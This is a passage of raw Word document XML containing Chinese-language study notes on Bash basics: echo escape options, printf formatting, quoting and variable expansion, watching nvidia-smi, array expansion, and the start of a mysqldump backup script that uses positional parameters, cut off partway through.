      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认情况下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭了对转义字符的解释，添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数可打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对转义字符的解释功能。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭转义字符，是默认值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4330C676" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="413A828C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>echo -e "hello\n wrold" #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>换行输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> hello world</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAEFAFD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>echo -E "hello\n wrold" #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> hello\n world</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>默认情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDFBCB6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25577540" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更推荐使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">printf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令进行输出，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还支持格式化输出，和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能类似，示例代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2739D7A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71127BAD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a=1231</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1F9887" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>printf "%d - %d = $a\n" 12 123 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>12 - 123 = 1231</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702B5678" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>printf "%d - %d = $a\n\n" 12 123 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 12 - 123 = 1231 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>空白行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A13B4B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="496C9645" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不会像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那样在一行结束自动添加换行符，连续多行使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时需要注意下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CDAFBA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EDB6A88" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令语法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>printf format-string [arguments...]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数之间用空格隔开，不能是逗号（和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言中的区别）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6292B5D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3156585D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="176" w:name="_Toc159779637"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串注意事项</w:t>
      </w:r>
      <w:bookmarkEnd w:id="176"/>
    </w:p>
    <w:p w14:paraId="5888B329" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>单引号不转义引号中的变量，会原样输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4E21C3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4371DE9A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>currentDate_Ym=`date "+%Y_%m"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02758C98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rootPath='/home/syj/wenhailin/$currentDate_Ym'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729F641B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>echo $rootPath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D04530" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/home/syj/wenhailin/$currentDate_Ym</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFB2A10" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>但是双引号可以输出变量的转义值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8989AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>currentDate_Ym=`date "+%Y_%m"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10734781" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rootPath="/home/syj/wenhailin/$currentDate_Ym"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318AE64C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>echo $rootPath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B1C18F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/home/syj/wenhailin/2023_01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165B5D86" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7066C6C7" w14:textId="77777777" w:rsidR="009D168E" w:rsidRDefault="009D168E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB125C8" w14:textId="68C0F237" w:rsidR="009D168E" w:rsidRDefault="009D168E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="177" w:name="_Toc159779638"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每两秒看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卡信息：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>watch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:bookmarkEnd w:id="177"/>
    </w:p>
    <w:p w14:paraId="618ECD51" w14:textId="77777777" w:rsidR="009D168E" w:rsidRDefault="009D168E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47084FF1" w14:textId="68279225" w:rsidR="009D168E" w:rsidRDefault="009D168E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009D168E">
        <w:t>watch -n 2 nvidia-smi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C48BDD" w14:textId="77777777" w:rsidR="009D168E" w:rsidRDefault="009D168E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A1F9799" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="178" w:name="_Toc159779639"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数组</w:t>
      </w:r>
      <w:bookmarkEnd w:id="178"/>
    </w:p>
    <w:p w14:paraId="3907B215" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此处参考备份脚本：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77479FE0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">${full_table_DDL[@]} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在大括号中的变量名后面加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> [*] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> [@] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可直接显示全部的数组元素。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CD42D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A89423E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仅表结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBEF0BB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>full_table_DDL=(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E261638" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  "bom"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662F257A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  "component"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BDAFEF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  "component_analysis_cache"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D132BE8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  "component_vulnerability"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23883315" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  "finding_attribution"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1C7144" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  "oss_components"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D31FFDD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  "project"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1231AA0A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1654F290" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqldump --column-statistics=0 -h${host} -P${port} -u${username} -p${password} -d --databases ${db} --tables </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>${full_table_DDL[@]}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; dump.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EA493D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E089B93" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B453E42" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A721402" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05768D1D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="179" w:name="_Toc159779640"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给脚本传参</w:t>
      </w:r>
      <w:bookmarkEnd w:id="179"/>
    </w:p>
    <w:p w14:paraId="301032BB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$1 $2 $3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现在脚本中，代表参数会出现的位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7876F550" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06AE05E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如我写的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysqldump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>备份脚本，如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D257B42" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>```shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F674FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F2B180" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "</w:t>
      </w:r>
      <w:r>
        <w:t>接受库名</w:t>
      </w:r>
      <w:r>
        <w:t>: $5"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0790600F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "</w:t>
      </w:r>
      <w:r>
        <w:t>接受表名</w:t>
      </w:r>
      <w:r>
        <w:t>: $6"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C1E0C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "</w:t>
      </w:r>
      <w:r>
        <w:t>接受更新时间戳</w:t>
      </w:r>
      <w:r>
